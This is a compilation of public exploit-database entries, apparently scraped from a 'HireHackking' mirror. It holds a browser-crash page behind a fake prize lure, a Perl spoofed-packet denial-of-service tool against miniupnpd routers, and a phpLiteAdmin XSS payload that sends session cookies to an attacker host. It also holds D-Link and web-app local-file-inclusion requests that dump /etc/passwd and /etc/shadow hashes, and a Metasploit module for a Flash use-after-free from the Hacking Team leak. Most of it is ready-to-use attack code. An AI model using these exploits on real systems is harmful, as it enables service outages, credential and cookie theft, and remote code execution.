<html>
<head>
<title>Arora Browser Remote Denial of Service </title>
<body bgcolor="Grey">
<script type="text/javascript">
function loxians() {
    var buffer = "";
    for (var i = 0; i < 8000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 8000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body>
<center>
<br><h2><a href="javascript:loxians();">YOU HAVE WON 100,000$ ! CLICK HERE!!</a></font></h2>
</body>
</html>
HireHackking 
#!/usr/bin/perl
#
#  miniupnpd/1.0 remote denial of service exploit
#
#  Copyright 2015 (c) Todor Donev 
#  todor.donev@gmail.com
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#
#  The SSDP protocol can discover Plug & Play devices, 
#  with uPnP (Universal Plug and Play). SSDP is HTTP 
#  like protocol and work with NOTIFY and M-SEARCH 
#  methods.  
#
#  See also: 
#  CVE-2013-0229 
#  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229  
#  CVE-2013-0230
#  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0230
#  
#  Tested on
#  Device Name :            IMW-C920W
#  Device Manufacturer :    INFOMARK (http://infomark.co.kr)
#  
#  These devices are commonly used by Max Telecom, Bulgaria
#
#  Disclaimer:
#  This or previous program is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#   
#  Use at your own risk!
#
#  See also:
#  SSDP Reflection DDoS Attacks 
#  http://tinyurl.com/mqwj6xt
#
#######################################
#
# # perl miniupnpd.pl
# 
# [  miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [  Usage:					    
# [ ./miniupnpd.pl <victim address> <spoofed address>
# [  Example:
# [ perl miniupnpd.pl 192.168.1.1 133.73.13.37
# [  Example:
# [ perl miniupnpd.pl 192.168.1.1
# [ =============================================== ]
# [ 2015  <todor.donev@gmail.com> Todor Donev  2015 ]
#
# # nmap -sU 192.168.1.1 -p1900 --script=upnp-info
#
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00078s latency).
# PORT     STATE SERVICE
# 1900/udp open  upnp
# | upnp-info:
# | 192.168.1.1
# |     Server: 1.0 UPnP/1.0 miniupnpd/1.0
# |     Location: http://192.168.1.1:5000/rootDesc.xml
# |       Webserver: 1.0 UPnP/1.0 miniupnpd/1.0
# |       Name: INFOMARK Router
# |       Manufacturer: INFOMARK
# |       Model Descr: INFOMARK Router
# |       Model Name: INFOMARK Router
# |       Model Version: 1
# |       Name: WANDevice
# |       Manufacturer: MiniUPnP
# |       Model Descr: WAN Device
# |       Model Name: WAN Device
# |       Model Version: 20070228
# |       Name: WANConnectionDevice
# |       Manufacturer: MiniUPnP
# |       Model Descr: MiniUPnP daemon
# |       Model Name: MiniUPnPd
# |_      Model Version: 20070228
# MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
#  
# Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
#
# # perl miniupnpd.pl 192.168.1.1
#
# [  miniupnpd/1.0 remote denial of service exploit ]
# [ =============================================== ]
# [ Target: 192.168.1.1
# [ Send malformed SSDP packet..
#
# # nmap -sU 192.168.1.1 -p1900
#  
# Starting Nmap 5.51 ( http://nmap.org ) at 0000-00-00 00:00 EEST
# Nmap scan report for 192.168.1.1
# Host is up (0.00085s latency).
# PORT     STATE  SERVICE
# 1900/udp closed upnp                                    // GOOD NIGHT, SWEET PRINCE.... :D
# MAC Address: 00:00:00:00:00:00 (Infomark Co.)           // CENSORED
#  
# Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
#
#
# Special thanks to HD Moore ..
#

use Socket;

if ( $< != 0 ) {
   print "Sorry, must be run as root!\n";
   print "This script use RAW Socket.\n"; 
   exit;
}

my $ip_src = (gethostbyname($ARGV[1]))[4];
my $ip_dst = (gethostbyname($ARGV[0]))[4];

print "\n[  miniupnpd/1.0 remote denial of service exploit ]\n";
print "[ =============================================== ]\n";
select(undef, undef, undef, 0.40);

if (!defined $ip_dst) {
    print "[  Usage:\n[ ./$0 <victim address> <spoofed address>\n";
    select(undef, undef, undef, 0.55);
    print "[  Example:\n[ perl $0 192.168.1.1 133.73.13.37\n";
    print "[  Example:\n[ perl $0 192.168.1.1\n";
    print "[ =============================================== ]\n";
    print "[ 2015  <todor.donev\@gmail.com> Todor Donev  2015 ]\n\n";
    exit;
}
socket(RAW, PF_INET, SOCK_RAW, 255) or die $!;
setsockopt(RAW, 0, 1, 1) or die $!;
main();

    # Main program
sub main {
    my $packet;
    
    $packet = iphdr();
    $packet .= udphdr();
    $packet .= payload();
    # b000000m...
    send_packet($packet);
}

    # IP header (Layer 3)
sub iphdr {
    my $ip_ver         	= 4;                 			# IP Version 4            (4 bits)
    my $iphdr_len      	= 5;                    		# IP Header Length        (4 bits)
    my $ip_tos         	= 0;                    		# Differentiated Services (8 bits)
    my $ip_total_len   	= $iphdr_len + 20;      		# IP Header Length + Data (16 bits)
    my $ip_frag_id     	= 0;                    		# Identification Field    (16 bits)
    my $ip_frag_flag   	= 000;                			# IP Frag Flags (R DF MF) (3 bits)
    my $ip_frag_offset 	= 0000000000000;      			# IP Fragment Offset      (13 bits)
    my $ip_ttl         	= 255;                  		# IP TTL                  (8 bits)
    my $ip_proto       	= 17;                   		# IP Protocol             (8 bits)
    my $ip_checksum    	= 0;                    		# IP Checksum             (16 bits)
    my $ip_src=gethostbyname(&randip) if !$ip_src; 		# IP Source 		  (32 bits)
    # IP Packet construction
	my $iphdr	= pack(
				'H2 H2 n n B16 h2 c n a4 a4',
				$ip_ver . $iphdr_len, $ip_tos, $ip_total_len,
				$ip_frag_id, $ip_frag_flag . $ip_frag_offset,
				$ip_ttl, $ip_proto, $ip_checksum,
				$ip_src, $ip_dst
			);

        return $iphdr;
}

    # UDP header (Layer 4)
sub udphdr {
    my $udp_src_port	= 31337;                     # UDP Sort Port           (16 bits) (0-65535)
    my $udp_dst_port	= 1900;	                     # UDP Dest Port           (16 btis) (0-65535)
    my $udp_len		= 8 + length(payload());     # UDP Length              (16 bits) (0-65535)
    my $udp_checksum 	= 0;                         # UDP Checksum            (16 bits) (XOR of header)

    # UDP Packet
    	my $udphdr      = pack(
				'n n n n',
				$udp_src_port, $udp_dst_port,
				$udp_len, $udp_checksum
				);
        return $udphdr;
}

    # Create SSDP Bomb
sub payload {
     my $data;
     my $head;
     $data = "M-SEARCH * HTTP\/1.1\\r\\n";
     for (0..1260) { $data .= chr( int(rand(25) + 65) ); }
     my $payload = pack('a' . length($data), $data);
return $payload;
}

    # Generate random source ip address
sub randip () {
srand(time() ^ ($$ + ($$ << 15)));
     my $ipdata;
        $ipdata 	= join ('.', (int(rand(255)), int(rand(255)), int(rand(255)), int(rand(255)))), "\n";
     my $ipsrc 		= pack('A' . length($ipdata), rand($ipdata));
return $ipdata;
}

    # Send the malformed packet
sub send_packet {
    print "[ Target: $ARGV[0]\n";
    select(undef, undef, undef, 0.30);
    print "[ Send malformed SSDP packet..\n\n";
    send(RAW, $_[0], 0, pack('Sna4x8', PF_INET, 60, $ip_dst)) or die $!;
}
HireHackking 
# Exploit Title:  CSRF & XSS
# Google Dork: intitle: CSRF & XSS
# Date: 2015-07-05
# Exploit Author:  John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: bitbucket.org/phpliteadmin
# Software Link: bitbucket.org/phpliteadmin
# Version: v1.1
# Tested on: windows 7
# Category: webapps

Vendor:
================================
bitbucket.org/phpliteadmin

Product:
================================
phpLiteAdmin v1.1

Advisory Information:
================================================
CSRF & XSS Vulnerabilities

Vulnerability Details:
======================

CSRF:
------
No CSRF token exists when making calls to various SQL operations
therefore we can get user to drop the whole database tables if they click
on our malicious link and table is known.

XSS:
------
There are three XSS vulnerabilities I point out first is use of 'PHP_SELF',
second is unsanitized parameter
for SQL statement when calling drop table method e.g. '
http://localhost/phpliteadmin.php?droptable=[XSS]'
and third is an unsanitized 'table' parameter e.g. '
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=[XSS]'

Lets look at the first one more in depth as its more fun.
phpliteadmin uses a PHP reserved server variable $_SERVER['PHP_SELF'] which
is vulnerable if not used correctly
allowing us to inject an XSS payload to steal session cookies and navigate
them to a place of our choosing
in order to cause mayhem.

On line 32 of 'phpliteadmin.php' we find vulnerable code:

--------------------------------------------------------
//build the basename of this file
$nameArr = explode("?", $_SERVER['PHP_SELF']);
$thisName = $nameArr[0];
$nameArr = explode("/", $thisName);
$thisName = $nameArr[sizeof($nameArr)-1];

//constants
define("VERSION", "1.1");
define("PAGE", $thisName);
-------------------------------------------------------

In PHP docs we find the following explanation of 'PHP_SELF':
"The filename of the currently executing script, relative to the document
root."
ref: http://php.net/manual/en/reserved.variables.server.php

It is known $_SERVER['PHP_SELF'] can make your application insecure as we
can inject code following a forward slash "/"
But we have slight problem to overcome, we can execute code but our forward
slashes will not be processed correctly
and exploit will FAIL! leaving us with the following useless URL instead of
taking the victim to a domain of our choice.


Fail exploit example:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/
"'onMouseOver="window.open('http://hyp3rlinx.altervista.org')"

Failed Result:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/hyp3rlinx.altervista.org


But all is NOT lost!, we will construct our malicious URL forward slashes
in our JS call to window.open() method using
String.charCodeAt(58) for ':' and String.charCodeAt(47) for '/' which will
NOW give us what we seek, control over the users browser
taking them to some terrible dark place.

Bypass $_SERVER['PHP_SELF'] forward slash '//' processing issue:

Tada!, our successful XSS exploit:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'
hyp3rlinx.altervista.org';window.open(x);})()"


Exploit code(s):
===============

XSS(s) POC:
----------


1- $_SERVER['PHP_SELF'] XSS exploit steals current admin session cookie and
sends to remote server:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php/"'onMouseOver="(function(){var
x='http';x+=String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+'MALICIOUS-DOMAIN';window.open(x+String.fromCharCode(47)+'cookietheft.php'+String.fromCharCode(63)+'='+document.cookie);})()"


2- SQL droptable XSS:
http://localhost/sectest/phpliteadmin_v1-1/phpliteadmin.php?droptable=
<script>alert(666)</script>


3- SQL table XSS:
http://localhost/phpliteadmin_v1-1/phpliteadmin.php?table=
"/><script>alert(666)</script>



CSRF POC:
---------
Drop tables:
localhost/phpliteadmin_v1-1/phpliteadmin.php?droptable=mytable&confirm=1



Disclosure Timeline:
=========================================================


Vendor Notification:  NA
July 5, 2015  : Public Disclosure



Severity Level:
=========================================================
Med



Description:
==========================================================


Request Method(s):              [+] GET


Vulnerable Product:             [+] phpliteadmin_v1-1


Vulnerable Parameter(s):        [+] $_SERVER['PHP_SELF'], droptable, table


Affected Area(s):               [+] Admin


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.


(hyp3rlinx)
HireHackking 
#[+] Author: SATHISH ARTHAR
#[+] Exploit Title: Dlink Wireless Router Password File Access Exploit (Local File Inclusion)
#[+] Date: 07-07-2015
#[+] Platform: Hardware
#[+] Tested on: linux
#[+] Vendor: http://www.dlink.co.in
#[+] Product web page: http://www.dlink.co.in

#[+] Affected version:
DSL-2750u (firmware: IN_1.08 )
DSL-2730u (firmware: IN_1.02 )

#[+] Sites: sathisharthars.wordpress.com
#[+] Twitter: @sathisharthars
#[+] Thanks: offensive security (@offsectraining)


#########################################################################
Dlink Wireless Router Password File Access Exploit
#########################################################################

Summary:

The Dlink DSL-2750u and DSL-2730u wireless router improves
your legacy Wireless-G network. It is a simple, secure way to share your
Internet connection and allows you to easily surf the Internet, use email,
and have online chats. The quick, CD-less setup can be done through a web
browser. The small, efficient design fits perfectly into your home and
small office.


Desc:

The router suffers from an authenticated file inclusion vulnerability
(LFI) when input passed thru the 'getpage' parameter to 'webproc' script is
not properly verified before being used to include files. This can be exploited
to include files from local resources.


Tested on: mini_httpd/1.19 19dec2003



===============================================================


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/passwd HTTP/1.1

Host: 192.168.31.10

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: sessionid=2b48aa9b

Connection: keep-alive



HTTP/1.0 200 OK

Content-type: text/html

Pragma: no-cache

Cache-Control: no-cache

set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/



#root:x:0:0:root:/root:/bin/bash
root:x:0:0:root:/root:/bin/sh
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh


GET /cgi-bin/webproc?var:page=wizard&var:menu=setup&getpage=/etc/shadow HTTP/1.1

Host: 192.168.31.10

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:35.0) Gecko/20100101 Firefox/35.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: sessionid=2b48aa9b

Connection: keep-alive


HTTP/1.0 200 OK

Content-type: text/html

Pragma: no-cache

Cache-Control: no-cache

set-cookie: sessionid=2b48aa9b; expires=Fri, 31-Dec-9999 23:59:59 GMT;path=/



#root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
root:$1$BOYmzSKq$ePjEPSpkQGeBcZjlEeLqI.:13796:0:99999:7:::
#tw:$1$zxEm2v6Q$qEbPfojsrrE/YkzqRm7qV/:13796:0:99999:7:::
HireHackking 
source: https://www.securityfocus.com/bid/54611/info

The 'com_hello' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. 

http://www.example.com/index.php?option=com_hello&controller=../../../../../../../../etc/passwd%00
HireHackking 
source: https://www.securityfocus.com/bid/54613/info

Maian Survey is prone to a URI-redirection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit these vulnerabilities to execute arbitrary local files within the context of the webserver process or redirect users to a potentially malicious site. This may aid in phishing attacks or allow the attacker to compromise the application; other attacks are also possible.

Maian Survey 1.1 is vulnerable; other versions may also be affected. 

http://www.example.com/[PATH]/admin/index.php?cmd=LF�°_here
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ByteArray Use After Free',
      'Description'         => %q{
        This module exploits an use after free on Adobe Flash Player. The vulnerability,
        discovered by Hacking Team and made public on its July 2015 data leak, was
        described as an Use After Free while handling ByteArray objects. This module has
        been tested successfully on:

        Windows XP, Chrome 43 and Adobe Flash 18.0.0.194,
        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
        Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Unknown', # Someone from HackingTeam
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
          ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81 ||
              os =~ OperatingSystems::Match::WINDOWS_VISTA ||
              os =~ OperatingSystems::Match::WINDOWS_XP
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::CHROME
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
              # Note: Chrome might be vague about the version.
              # Instead of 18.0.0.203, it just says 18.0
              return true if ver =~ /^18\./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
            when 'Linux'
              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
            end

            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'Jul 06 2015',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf

    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    os_name = target_info[:os_name]

    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'hacking_team', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end